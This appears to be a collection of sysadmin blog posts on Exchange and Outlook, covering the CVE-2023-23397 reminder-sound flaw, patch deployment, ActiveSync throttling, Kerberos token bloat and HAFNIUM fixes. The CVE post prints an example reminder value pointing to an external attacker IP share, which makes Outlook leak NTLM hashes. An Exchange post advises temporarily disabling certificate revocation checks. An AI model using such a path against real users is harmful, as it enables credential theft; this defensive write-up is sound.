CVE-2023-23397, Outlook.exe exploit, PidLIDReminder custom sound via SMB for appointment reminders

by butsch 15. March 2023 03:00

CVE-2023-23397, what is being exploited:

Instead of the default Microsoft Outlook sound you can specify a custom sound for a meeting reminder. That sound can sit on a share. That is where the problem lies.

https://learn.microsoft.com/de-de/office/client-developer/outlook/mapi/pidlidreminderoverride-canonical-property

https://www.forbes.com/sites/daveywinder/2023/03/15/microsoft-outlook-warning-critical-new-email-exploit-triggers-automatically-update-now/?sh=47f058ce6e5e

CVE-2023-23397 is an Outlook bug. If you send an incoming e-mail for an appointment with a custom reminder (sound, attribute PidLIDReminder), Outlook.exe (2012/2016) will try to fetch the sound file via SMB, even from an external share (without regard to the site zones in IE/Edge/system). If port 445 is open to that destination, the system sends an NTLM hash outside your network. As we understood it, most existing AV solutions for on-premise Exchange currently cannot scan this PidLIDReminder attribute (Trend, Trellix Security for Exchange). That is why the MS Exchange team provided the script.

This is where you can specify a custom sound for an APPOINTMENT.

E.g. alarm "\\213.145.33.11\attacker_ldap_scanner_hash\M365_Ausfall_Nichts_geht_mehr_alle_user_Ferien.wav"
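As an added example (not from the original post), here is how a defender can sort reminder sound paths into local, internal UNC and external UNC; the internal DNS suffix and the sample list are constructed, built around the share path quoted above.

```python
import ipaddress
import re

# Internal DNS suffixes your organisation owns (assumption for this example; adjust).
INTERNAL_SUFFIXES = (".corp.example",)

# Constructed sample reminder sound paths. The first is the share path quoted in this
# post; the others are made up to show the internal and local cases.
SAMPLE_REMINDER_PATHS = [
    r"\\213.145.33.11\attacker_ldap_scanner_hash\M365_Ausfall_Nichts_geht_mehr_alle_user_Ferien.wav",
    r"\\fileserver01.corp.example\sounds\reminder.wav",
    r"\\10.20.30.40\public\chime.wav",
    r"\\FILESRV\sounds\chime.wav",
    r"C:\Windows\Media\Alarm01.wav",
]

# \\host\share\...  ->  group 1 is the host part
UNC_RE = re.compile(r"^\\\\([^\\]+)\\(.+)$")


def parse_unc_host(path):
    """Return the host of a UNC path, or None when the path is local (drive letter etc.)."""
    m = UNC_RE.match(path)
    return m.group(1) if m else None


def host_is_internal(host):
    """True for RFC1918/loopback/link-local IPs, single-label names and owned DNS suffixes."""
    try:
        ip = ipaddress.ip_address(host)
        return ip.is_private or ip.is_loopback or ip.is_link_local
    except ValueError:
        pass  # not an IP literal, treat as a DNS name below
    h = host.lower().rstrip(".")
    if "." not in h:
        return True  # single-label NetBIOS/WINS-style names only resolve inside the LAN
    return any(h.endswith(s) for s in INTERNAL_SUFFIXES)


def classify_reminder_path(path):
    """'local', 'internal-unc' or 'external-unc'; the last one is the CVE-2023-23397 indicator."""
    host = parse_unc_host(path)
    if host is None:
        return "local"
    return "internal-unc" if host_is_internal(host) else "external-unc"


def find_suspicious(paths):
    """Keep only the reminder paths that would make Outlook authenticate to an outside host."""
    return [p for p in paths if classify_reminder_path(p) == "external-unc"]
```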

 

PRIO1

is to install the Outlook.exe patch and restart the clients, and also to make sure customers do not open SMB for external connections. This is usually closed from client VLAN > WAN. Tricky are home office and remote workers who, depending on their split VPN, would have 445/SMB open.

Patches for Outlook 2013/2016:

https://support.microsoft.com/kb/5002254

2016 Direct download

https://www.catalog.update.microsoft.com/Search.aspx?q=outlook%202016 (All Outlook 2016 Patches, pick the ones from 14.03.2023)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab (32BIT)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_8d949e375d119c72a375435cd77a4797fb2e0b2b.cab (64BIT)

2013 Direct download

https://www.catalog.update.microsoft.com/Search.aspx?q=outlook%202013 (All Outlook 2013 Patches, pick the ones from 14.03.2023)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_2cb1193a28972b39546f59d104ae5be489c01d8d.cab (64BIT)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_2e7b2f55dcab1fd7d3b00aa1dbd2545fb90e435c.cab (32BIT)

 

Manual installation: extract the CAB files and THEN double-click the .MSP patch file.

 

Deployment outside WSUS: the .CAB files can be installed from the command line as follows.

DISM.EXE does not seem to work for the Office CAB files.

You can, however, open the CAB file and simply install the MSP file inside it. Windows Installer looks for and finds the rest, e.g. the source of the Office files.

msiexec /p C:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897\outlook-x-none.msp /qb

msiexec /p C:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897\outlook-x-none.msp /qn

(/qb shows a basic progress UI, /qn runs silently for unattended deployment.)

 

 

  

DISM.EXE does not seem to work for the Office CAB files.

https://social.technet.microsoft.com/Forums/lync/en-US/683d7d72-b296-419f-b585-becd5d99b37f/dism-offline-update-error-0x80070002

dism /Online /Add-Package /PackagePath:"c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab"

Depending on the system this gives an error because it does not have the underlying CBS package it needs:

Failed to get the underlying CBS package. - CDISMPackageManager::OpenPackageByPath(hr:0x80070002)

Usually with other CAB packages these are included in the CAB/archive; not here, e.g. with Outlook 2016 on W11 22H2.

Example file from 202X: there you first had to install the SSU and then the patch with DISM.

With the current Outlook patch, however, only an MSP is included.

2016/W11

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Processing the top level command token(add-package). - CPackageManagerCLIHandler::Private_ValidateCmdLine

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Attempting to route to appropriate command handler. - CPackageManagerCLIHandler::ExecuteCmdLine

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Routing the command... - CPackageManagerCLIHandler::ExecuteCmdLine

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Encountered the option "packagepath" with value "c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab" - CPackageManagerCLIHandler::Private_GetPackagesFromCommandLine

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed opening package. - CDISMPackageManager::Internal_CreatePackageByPath(hr:0x80070002)

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed to get the underlying CBS package. - CDISMPackageManager::OpenPackageByPath(hr:0x80070002)

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed to open the package at location: "c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab" - CPackageManagerCLIHandler::ProcessPackagePath(hr:0x80070002)

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed to get the count of packages from the command line. - CPackageManagerCLIHandler::ProcessCmdLine_AddPackage(hr:0x80070002)

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed while processing command add-package. - CPackageManagerCLIHandler::ExecuteCmdLine(hr:0x80070002)

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Further logs for online package and feature related operations can be found at %WINDIR%\logs\CBS\cbs.log - CPackageManagerCLIHandler::ExecuteCmdLine

2023-03-16 10:46:42, Error DISM DISM.EXE: DISM Package Manager processed the command line but failed. HRESULT=80070002

 

The Patch info from WSUS.

 

PRIO2

is FORENSICS, to find out whether you have received such e-mails and hopefully prevent them from being delivered to Outlook.exe. You can also repair those that have already arrived. If you are on-premise, check whether your Exchange AV solution can look for the attribute (the AV solution for Exchange in principle already has all the rights that you would otherwise have to grant separately to run the script; the only question is WHETHER it finds the attribute with its current version).

 

Important for the PRIO 2 SCRIPT: We recommend this only for people who have experience with such commands, e.g. from integrating an archiving solution or a mobile device management (MDM) solution. You may also have to consult your in-house legal/compliance team, because as far as I understood you are granting someone full access to the e-mails of your CEO and board (I have not reviewed the script in detail).

https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/

 

The script does the following:

  • Generates an unlimited (full) throttle policy for a group or a user (such as an MDM master account or an account that feeds a legal archiving solution).
  • Generates a rule so that one user has full access to every e-mail, calendar entry etc. stored in the Exchange environment (Application Impersonation / https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-...).
  • Scans all e-mails, or at least some days backwards. Since Ukraine was attacked in 03/2022, so for a year? Or was that information wrong? Microsoft says here that you should scan particularly attractive targets (who are these supposed to be? The CEO/board or just the user?)

 

Action required 16.03.2023

Install the patch and make sure everyone has done the reboot

Make sure port 445/SMB is closed LAN>WAN (possibly adjust the remote worker firewall GPO/policy, or do it via a FW module, e.g. of the antivirus, e.g. McAfee ENS Firewall)

The PowerShell scripts currently circulating are intended exclusively for forensic purposes and for searching for indicators of compromise. These scripts, however, require careful handling, since the script user has to be given full access to all resources, including the ability to regulate the speed of the script. Please therefore do not run the script until we can make sure that no problems arise due to language barriers.

It is important to note that the PowerShell script is not necessary to close the Outlook.exe vulnerability. It serves exclusively the forensic investigation and the replacement of the 1-2% of calendar entries that have not yet been updated because of offline connections. It is, however, unlikely that these scripts are required, as the first wave of the attack came via an e-mail with a blocked attachment (.MSI).

Finally, it is important to stress that the Exchange patch from March 2023 has no effect on the Outlook.exe vulnerability.

 

Image: source ACEResponder/Twitter

Image: source MS Learn

Good blog:

https://practical365.com/cve-2023-23397-ntlm-vulnerability/ (not the source of the info)

 

Tags:

Hotfixes / Updates | Exchange 2010 | Exchange 2013 | Exchange 2016 | Exchange 2019 | M365/AZURE | SECURITY | SPAM Fortimail

Exchange 2013/2016 EAS ActiveSync (MDM, mobile) stops syncing. Event 2002, limit max, TargetBackend, will be rejected

by butsch 31. August 2022 12:03

Problem: Exchange 2013/2016 ActiveSync MDM phones stop syncing, Event 2002, limit max, TargetBackend, will be rejected

In general this could be an EAS ActiveSync device running mad or a user using functions like Time to Leave on iPhone (see link at the end of this document).

It's rather important that we find what causes the effect instead of just turning up some value. It could also be an attack from outside if you have Outlook Anywhere open on the WAN or ActiveSync open and no reverse proxy like KEMP or Sophos in front of it. (Don't ask, M365 has a reverse proxy so do it too....)

Search for Event 2002 in Application.

Source: MSExchange Front End HTTP Proxy

EventID: 2002

General: [Eas] The number of outstanding requests for guard TargetBackend("hostex13.brooks.cz") has exceeded the max limit 5000. Current request will be rejected.

From when on did it happen, for further analysis:

Search backwards in the log files to see when it happened (when the last EAS ActiveSync sync was done).

Search for text:

"/Microsoft-Server-ActiveSync/default.eas"

In Directory:

C:\inetpub\logs\LogFiles\W3SVC1

C:\inetpub\logs\LogFiles\W3SVC2

Find the last logfile/event and, as usual, apply your timezone shift to the IIS date/time (IIS logs in UTC).

09:30 UTC (logfiles)

09:30 UTC + 2h > 11:30 local time in Switzerland, as an example. Give this info to the firewall team if you have ActiveSync open from external.
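Added example, not from the original post: a small parser for the IIS W3C log that finds the last ActiveSync request, converts its UTC timestamp to local time and counts requests per DeviceId, so a runaway device shows up; the log excerpt is constructed.

```python
from collections import Counter
from datetime import datetime, timezone
from zoneinfo import ZoneInfo

EAS_STEM = "/Microsoft-Server-ActiveSync/default.eas"

# Constructed W3C extended log excerpt (not a real customer log). IIS writes UTC.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2022-08-31 09:15:02 10.0.0.5 POST /Microsoft-Server-ActiveSync/default.eas Cmd=Ping&User=a.smith&DeviceId=IPHONE1 443 corp\\a.smith 203.0.113.9 Apple-iPhone 200
2022-08-31 09:29:58 10.0.0.5 POST /Microsoft-Server-ActiveSync/default.eas Cmd=Ping&User=j.doe&DeviceId=ABC123 443 corp\\j.doe 198.51.100.7 Apple-iPhone 200
2022-08-31 09:29:59 10.0.0.5 POST /Microsoft-Server-ActiveSync/default.eas Cmd=Sync&User=j.doe&DeviceId=ABC123 443 corp\\j.doe 198.51.100.7 Apple-iPhone 200
2022-08-31 09:30:00 10.0.0.5 POST /Microsoft-Server-ActiveSync/default.eas Cmd=Sync&User=j.doe&DeviceId=ABC123 443 corp\\j.doe 198.51.100.7 Apple-iPhone 200
2022-08-31 09:31:10 10.0.0.5 GET /owa/ - 443 - 203.0.113.10 Mozilla/5.0 200
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the column names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # skip malformed lines instead of mis-assigning columns
        yield dict(zip(fields, values))


def eas_requests(text):
    """All requests hitting the ActiveSync endpoint."""
    return [r for r in parse_w3c(text) if r["cs-uri-stem"] == EAS_STEM]


def last_eas_sync(text, local_tz="Europe/Zurich"):
    """Return (utc, local) datetimes of the last ActiveSync request, or None if there is none.

    local_tz may be an IANA zone name or a tzinfo object.
    """
    rows = eas_requests(text)
    if not rows:
        return None
    last = max(rows, key=lambda r: (r["date"], r["time"]))
    utc = datetime.strptime(f"{last['date']} {last['time']}", "%Y-%m-%d %H:%M:%S")
    utc = utc.replace(tzinfo=timezone.utc)
    tz = ZoneInfo(local_tz) if isinstance(local_tz, str) else local_tz
    return utc, utc.astimezone(tz)


def eas_device_counts(text):
    """Requests per DeviceId taken from cs-uri-query; a device running mad stands out here."""
    counts = Counter()
    for r in eas_requests(text):
        params = dict(p.split("=", 1) for p in r["cs-uri-query"].split("&") if "=" in p)
        counts[params.get("DeviceId", "?")] += 1
    return counts
```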

 

Resolution:

Depending on where this was logged we have to change two parameters hard-coded in web.config files. Please first make a backup of the web.config file.

A Cumulative Update may, in the worst case, reset this setting, so document it.

Add or change:

<add key="HttpProxy.ConcurrencyGuards.TargetBackendLimit" value="9000" />

In Directory:

D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\sync

D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\rpc

In File:

web.config

under

<appSettings>

Add or change the value

<add key="HttpProxy.ConcurrencyGuards.TargetBackendLimit" value="5000" />

Or (If it's not enough like with MAD/technical activesync users 150+ devices)

<add key="HttpProxy.ConcurrencyGuards.TargetBackendLimit" value="9000" />

 

Restart/recycle the following app pools in IIS Manager.

Check the IIS Logfiles again, yes works again, solved.

 

References for the absolutely crap Apple iPhone function which kills your Exchange:

Time to Leave causing unexpected meeting … - Apple Community

https://discussions.apple.com/thread/7905692

 

Tags:

Microsoft Exchange | Exchange 2010 | Exchange 2013 | Exchange 2016

Exchange 2010 – 2016 Migration: removal of old MDB fails (MailboxExports)

by butsch 28. July 2022 17:05

 

Error: This mailbox database is associated with one or more active MailboxExport requests

Source: This means you have current/pending/stalled PST exports (as an example) running (maybe very old).

Solution: You will have to remove those before you are able to remove the empty old Exchange MDB.

Get-MailboxExportRequest (ExchangePowerShell) | Microsoft Docs

 

 

Microsoft Exchange Error

--------------------------------------------------------

The mailbox database 'MDB01' cannot be deleted.

 MDB01

Failed

Error:

This mailbox database is associated with one or more active MailboxExport requests. To get a list of all MailboxExport requests associated with this database, run Get-MailboxExportRequest | ?{ $_.RequestQueue -eq "<Database ID>" }. To remove a MailboxExport request, run Remove-MailboxExportRequest <Recipient ID\Request Name>.

 

 

IF you made (generated/started) the EXPORT, for example to .PST files, years ago (or with a bot/batch), they could still exist. Even if the user you USED (admin.stupidelegationgonewrong.d) does not exist anymore.

A reminder for all the enterprise senior security engineers with their different account strategies: It's OK, but never delete an account from IT, just disable the account and move it into some OU. If some nerd/newbie does not understand the complexity and wants to delete the account, just hide them securely in ADS.

You can see below that under the domain\domainadminuser account "administrator" you don't even see the POWERSHELL command:

Get-MailboxExportRequest

 

When you start typing Get-MailboxExp**** and use autocomplete with TAB it does not show up. That is because someone exported under another account. As I understood it, you can only see the export under that account.

Re-enable the account and start PowerShell with that account as seen below.

With a user which has the permission you can see the command:

Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest

Get-MailboxExportRequest -Status Failed | Remove-MailboxExportRequest

 

Please also see following post related to move and deletion of default Mailboxes when you want to migrate things:

Butsch.ch | Exchange 2007/2010 Delete default Mailbox Database / remove last Mailbox/SG

 

 

Tags:

Microsoft Exchange | Exchange 2010 | Exchange 2016 | Exchange 2019 | M365/AZURE

Exchange 2013/2016 and 2010 proxy back (400) Bad Request, ADS user is a member of too many ADS groups

by butsch 23. June 2021 20:41

Exchange 2010/2013/2016 migration: problem after pointing DNS to the 2016 structure with some users' Outlook.exe

When you thought Kerberos bloating was way back in 2012, it returns. And after some research it is still all over the place. It affects on-premise solutions as well as cloud solutions like ADFS, Azure etc.

 

Error:

This error (HTTP 400 Bad Request) means that Internet Explorer was able to connect to the web server, but the webpage could not be found because of a problem with the address.

Reason:

The Active Directory user is a member of too many Active Directory groups: Kerberos ticket bloating.

Solution:

You can modify a parameter on the 2010 CAS to allow larger Kerberos packets to be used for authentication to web services. This may also be valid for other problems where you authenticate to a web server solution with Kerberos (Active Directory), for example ticket systems, intranet solutions, SharePoint, security appliances etc.

Pro key facts:

You can test the effects by opening the Autodiscover URL in a web browser. Don't spend too much time on outlook.exe not opening (because Autodiscover does not work at that moment you won't be able to).

MS says on the CAS 2010 only. HPE Services once had a KB which said DC and CAS. (Maybe older DCs at that time.)

Problem:

We have read/heard numbers like an ADS user object in 200+ ADS groups. So at that point we dropped further research and thought this does not affect the customer, because the maximum was 130 groups a user was in.

But one employee was affected where one user was in only 83 groups and a second user was in 127 groups. There seems to be other Kerberos info which adds to that and hits some limit when the Kerberos packet is proxied back from Exchange 2016 to 2010 and then to the domain controller.

You can count the memberships with a 3-liner in PS (tokenGroups is the expanded, nested membership that ends up in the ticket):

$user = Get-ADUser m.butsch

$token = (Get-ADUser $user -Properties tokenGroups).tokenGroups

$token.Count

 

At the point where most is set up and you move the Autodiscover SCP/DNS to Exchange 2016, some people are:

The key fact is that you can test and DEBUG this by just opening the URL in a web browser. So you don't have to fiddle around with outlook.exe /rpcdiag. Because you can't open Outlook.exe you are also unable to test Autodiscover by right-clicking the Outlook symbol.

This may be a pitfall if you had Kerberos authentication in place and for that reason FOCUS too much in that direction. If you want to take over Kerberos authentication from 2010 to 2016 you may have to build it back and then build it up again on 2016.

 

This is how the effect shows up on a Client with Outlook 2016.

"Die systemresourcen sind sehr niedrig. Schliessen Sie einige Fenster"

 

This is how the Outlook profiles look after some debug sessions if the effect is there:

 

To test if the effect is there:

As the user > if you open the Autodiscover URL in different browsers you get error 400

 

Google Chrome:

Internet Explorer 11 (because mostly people set PROXY and EXCEPTIONS there and other browsers import them from there) > which has to be working for Exchange 2013/2016 with a web proxy active (you have to exclude all Exchange 2010/2013/2016/2019 FQDNs from the proxy).

 

In the Exchange 2016 server log files you see the following error:

"C:\Program Files\Microsoft\Exchange Server\V15\Logging\HttpProxy\Autodiscover\*.log"

Check the SIZE of the log files growing as soon as you hand over the DNS for Autodiscover from the 2010 to the 2016 servers.

 

Search for text:

 

The remote server returned an error: (400) Bad Request.

2021-06-22T10:28:44.962Z,f2c25044-6223-41d6-9737-da6f010f1ffe,15,1,2242,10,{49184D7A-04D7-47BD-977C-A0DE7BC9AA8B},Autodiscover,autodiscover.fda.ch,/Autodiscover/Autodiscover.xml,,Negotiate,true,fda\u1234,fda.ch,Smtp~Linsi.vonn@fda.ch,Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.5149; Pro),172.30.46.211,fdaEXC7,400,400,,POST,Proxy,fdacas2.fda.ch,14.03.0123.000,IntraForest,AnchorMailboxHeader-SMTP,,,,353,346,,,9,1,,0,1;,1,,0,1,,0,14,0,1,0,0,0,0,1,0,0,0,5,0,1,3,3,12,14,,,,BeginRequest=2021-06-22T10:28:44.947Z;CorrelationID=<empty>;

ProxyState-Run=None;AccountForestGuard_fda.ch=1;DownLevelTargetRandomHashing=0/3;ClientAccessServer=fdaCAS2.fda.ch;ResolveCasLatency=0;FEAuth=BEVersion-1937997947;ProxyToDownLevel=True;RoutingEntry=DatabaseGuid:81fdd93e-6b0a-49f0-ae6b-c41619e3ebad%40fda.ch%40fda.ch Server:fdaEXC4.fda.ch+1937997947@0;BeginGetRequestStream=2021-06-22T10:28:44.960Z;OnRequestStreamReady=2021-06-22T10:28:44.960Z;BeginGetResponse=2021-06-22T10:28:44.961Z;OnResponseReady=2021-06-22T10:28:44.961Z;EndGetResponse=2021-06-22T10:28:44.961Z;ProxyState-Complete=ProxyResponseData;SharedCacheGuard=0;EndRequest=2021-06-22T10:28:44.962Z;I32:ADS.C[fdaDCW2]=1;F:ADS.AL[fdaDCW2]=0.9151757;I32:ATE.C[fdaDCW2.fda.ch]=1;F:ATE.AL[fdaDCW2.fda.ch]=0,WebExceptionStatus=ProtocolError;ResponseStatusCode=400;WebException=System.Net.WebException:

The remote server returned an error: (400) Bad Request. at System.Net.HttpWebRequest.EndGetResponse(IAsyncResult asyncResult) at Microsoft.Exchange.HttpProxy.ProxyRequestHandler.<>c__DisplayClass197_0.<OnResponseReady>b__0();,,|RoutingDB:81fdd93e-6b0a-49f0-ae6b-c41619e3ebad,,,CafeV1

 

 

On the domain controllers you may see the following just at the time you open the Autodiscover URL in the browser of the client:

You may see the following error from the Exchange 2010 CAS server on one of your domain controllers. Check the events under Security for "Event 4769, Audit Failure":

A Kerberos service ticket was requested.

 

Account Information:

    Account Name:        FDACAS2$@FDA.CH

    Account Domain:        FDA.CH

    Logon GUID:        {00000000-0000-0000-0000-000000000000}

 

Service Information:

    Service Name:        FDAcas2$@FDA.CH

    Service ID:        NULL SID

 

Network Information:

    Client Address:        ::ffff:172.30.46.134

    Client Port:        54554

 

Additional Information:

    Ticket Options:        0x40810000

    Ticket Encryption Type:    0xFFFFFFFF

    Failure Code:        0x12

    Transited Services:    -

Event Xml:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">

<System>

<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />

<EventID>4769</EventID>

<Version>0</Version>

<Level>0</Level>

<Task>14337</Task>

<Opcode>0</Opcode>

<Keywords>0x8010000000000000</Keywords>

<TimeCreated SystemTime="2021-06-22T09:43:13.941534700Z" />

<EventRecordID>1163245364</EventRecordID>

<Correlation />

<Execution ProcessID="484" ThreadID="1188" />

<Channel>Security</Channel>

<Computer>fdaDCW2.fda.ch</Computer>

<Security />

</System>

<EventData>

<Data Name="TargetUserName">fdaCAS2$@fda.CH</Data>

<Data Name="TargetDomainName">fda.CH</Data>

<Data Name="ServiceName">fdacas2$@fda.CH</Data>

<Data Name="ServiceSid">S-1-0-0</Data>

<Data Name="TicketOptions">0x40810000</Data>

<Data Name="TicketEncryptionType">0xffffffff</Data>

<Data Name="IpAddress">::ffff:172.30.46.134</Data>

<Data Name="IpPort">19080</Data>

<Data Name="Status">0x12</Data>

<Data Name="LogonGuid">{00000000-0000-0000-0000-000000000000}</Data>

<Data Name="TransmittedServices">-</Data>

</EventData>

</Event>

 

 

Solution:

Depending on the source where this was offered you may have to adapt that on the:

Exchange 2010 CAS (IIS)

But I found some articles from HPE IT Services which say also on the DC. Do NOT change it on the DC if the change on the CAS works.

Remember, if you have for example several CAS behind a load balancer, that the effect is backwards from Exchange 2016 to 2010. Only a little of that process goes over the front of the load balancer (like KEMP or F5). So you have to patch all CAS.

I am not aware whether CAS servers you EXCLUDED from the CAS serving service are also affected by this or not.

 

https://docs.microsoft.com/en-US/exchange/troubleshoot/client-connectivity/400-bad-request

 

Microsoft says:

On every Exchange 2010 CAS, locate the following subkey:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters

Under this subkey, increase the MaxFieldLength and MaxRequestBytes entries by using the values in the following table.

 

Value name         Value type    Value data    Value base

MaxFieldLength     DWORD         65536         Decimal

MaxRequestBytes    DWORD         65536         Decimal

 

To check if it's working:

Open https://autodiscover.yourdomain.ch/autodiscover/autodiscover.xml

A credentials popup is fine; if there is none, that is fine too.

But you have to see the XML file with error 600; then all is fine.

 

Find Autodiscover endpoints by using SCP lookup in Exchange | Microsoft Docs

PowerShell to check the group membership of all ADS users, to be run on your DC.

Writes a text logfile: user_groups.txt

# V1.0, 22.06.2021, M. Butsch, www.butsch.ch
# Writes "SamAccountName;Name;token group count" for every AD user into user_groups.txt
Start-Transcript -Path user_groups.txt

$Users = Get-ADUser -Filter * -Properties Name, GivenName, Surname, SamAccountName, UserPrincipalName, MemberOf, Enabled -ResultSetSize $Null

foreach ($User in $Users)
{
    # tokenGroups is the expanded (nested) membership, which is what ends up in the Kerberos ticket
    $token = (Get-ADUser $User -Properties tokenGroups).tokenGroups
    $MATOKEN = $token.Count
    Write-Host "$($User.SamAccountName);$($User.Name);$MATOKEN"
}

Stop-Transcript

 

Tags:

Exchange 2010 | Exchange 2013 | Exchange 2016 | Microsoft Exchange

03.03.2021 Exchange 2010, 2013, 2016, 2019 Patch KB5000871: how to update correctly, with links

by butsch 3. March 2021 23:19

HAFNIUM targeting Exchange Servers with 0-day exploits

Important Exchange Update 03.03.2021 for all Microsoft Exchange Versions

Affected Exchange versions: 2010, 2013, 2016, 2019

     

12.03.2021

We have seen so many installations fail on certain blogs and forums. Please make sure you understand the update process of patching a special server like Exchange or SQL Server. You never patch such a system core server application without reading a few things first.

There is absolutely no business justification for an outage in the e-mail system because someone wanted to patch a leak within a few minutes. Microsoft does its best to put some logic into the patch files. However they are just Windows MSP files, and the main logic for that is in the Windows Installer module which is on every server or client from MS.

   

10.03.2021

MS has to rebuild/redo/re-tune their Exchange repair TechNet/MSDN material due to the high number of Exchange on-premise outages, mostly related to non-Exchange groupware engineers patching complex Exchange servers in the emergency.

Repair failed installations of Exchange Cumulative and Security updates - Exchange | Microsoft Docs

https://docs.microsoft.com/en-us/exchange/troubleshoot/client-connectivity/exchange-security-update-issues

 

 

REMINDER: Install any Exchange ROLLUP/update with elevated Administrator rights!

  1. Select Start, and then type cmd.
  2. Right-click Command Prompt from the search results, and then select Run as administrator.
  3. If the User Account Control window appears, select the option to open an elevated Command Prompt window, and then select Continue. If the UAC window doesn't appear, continue to the next step.
  4. Type the full path of the .msp file for the security update, and then press Enter.
  5. After the update installs, restart the server.

 

     

REMINDER: Make sure you have SCHEMA ADMIN rights for certain updates (do not update with a least-privilege account like admin.butsch or 1stlevelsupportuser1, and if you do, pre-check that it has all the rights it needs).

REMINDER: Most modern ROLLUPs for Exchange a) save the config to many XML files, b) do a complete uninstall of the full EXCHANGE, c) re-install the full Exchange with the settings from the XML files (do not interrupt, wait until it's done!). If it fails you will see services deactivated and Exchange missing!

     

In larger enterprise and PROXY environments

Always make sure that:

* the Exchange Server computer has access to all CRL (certificate revocation list) addresses and also the network protocols related to CERTIFICATES (the computer, when locked down, MUST have access to the WAN for these files)

* you DISABLE cert revocation checking in Internet Explorer 10/11 or Edge on the server (the computer account uses those settings for PROXY or cert revocation settings)

* you DO temporarily disable it: cmd.exe > iexplore.exe > Advanced > "Check for server certi*" < uncheck both and restart the Exchange setup for the ROLLUP/CU

CHECK: https://www.butsch.ch/post/The-certificate-is-invalid-for-exchange-server-usage-Exchange-2010-SANUC.aspx

CHECK: http://www.computerladen.ch/post/Exchange-2010-SP3-RU282930-ended-prematurely-(Management-Framework-30-on-Server).aspx

Check cert revocation from Exchange to WAN: if it's not open, HIT the security engineer in your company who closed internet access for servers and did not understand cert revocation. Never lock down servers if you don't fully understand what they do.

     

     

Microsoft explained it with a graph now too, since 25% did not understand at first glance. Including everyone I know.

https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020

 

      

Tech Links from 09.03.2011:

https://www.reddit.com/r/sysadmin/comments/m0d98h/exchange_nuked_and_reinstalled_what_can_i_and/

https://blueteamblog.com/microsoft-exchange-zero-days-mitigations-and-detections

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

      

News coverage done wrong:

Looks like the mainstream security magazines got something wrong here ;-) The patch was released almost at the same time as the one for 2013/2016/2019. 2010 was supported and patched last week with a one-shot patch already.

CVE we talk about:

CVE-2021-26854

Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.

CVE-2021-26855

Is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.

CVE-2021-26857

Is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.

CVE-2021-26858

Is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin's credentials.

CVE-2021-27065

Is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin's credentials.

      

Here is what we talk about:

https://nvd.nist.gov/vuln/detail/CVE-2021-26854

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

https://www.swissinfo.ch/ger/alle-news-in-kuerze/microsoft-schliesst-sicherheitsluecken-bei-exchange-software/46415548

https://www.forbes.com/sites/daveywinder/2021/03/03/microsoft-issues-critical-update-warning-as-chinese-hackers-attack-exchange-servers/?sh=5c92a6f17912

     

